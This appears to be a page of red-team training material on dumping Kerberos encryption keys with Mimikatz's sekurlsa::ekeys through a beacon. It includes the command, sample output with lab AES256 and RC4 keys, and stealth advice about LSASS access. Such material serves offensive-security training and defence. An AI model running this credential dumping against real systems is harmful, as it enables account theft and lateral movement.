Kerberos Encryption Keys

The sekurlsa::ekeys Mimikatz module will dump the Kerberos encryption keys of currently logged on users. Since most modern Windows services choose to use Kerberos over NTLM, leveraging these instead of NTLM hashes makes more sense for blending into normal authentication traffic.

These keys can be used in a variety of Kerberos abuse scenarios.

This command requires elevated privileges.

beacon> mimikatz !sekurlsa::ekeys

Authentication Id : 0 ; 459935 (00000000:0007049f)
Session           : Batch from 0
User Name         : jking
Domain            : DEV
Logon Server      : DC-2
Logon Time        : 9/1/2022 7:29:19 AM
SID               : S-1-5-21-569305411-121244042-2357301523-1105

	 * Username : jking
	 * Domain   : DEV.CYBERBOTIC.IO
	 * Password : (null)
	 * Key List :
	   aes256_hmac       4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6
	   rc4_hmac_nt       59fc0f884922b4ce376051134c71e22c
	   rc4_hmac_old      59fc0f884922b4ce376051134c71e22c
	   rc4_md4           59fc0f884922b4ce376051134c71e22c
	   rc4_hmac_nt_exp   59fc0f884922b4ce376051134c71e22c
	   rc4_hmac_old_exp  59fc0f884922b4ce376051134c71e22c

There is a known issue where Mimikatz may incorrectly label all of the hashes as des_cbc_md4.

In this case, the AES256 key is the one we want. These hashes are not automatically populated into the Credential data model, but they can be added manually via View > Credentials > Add.

OPSEC This module also opens a read handle to LSASS.

PreviousNTLM Hashes NextSecurity Account Manager

Last updated 2 years ago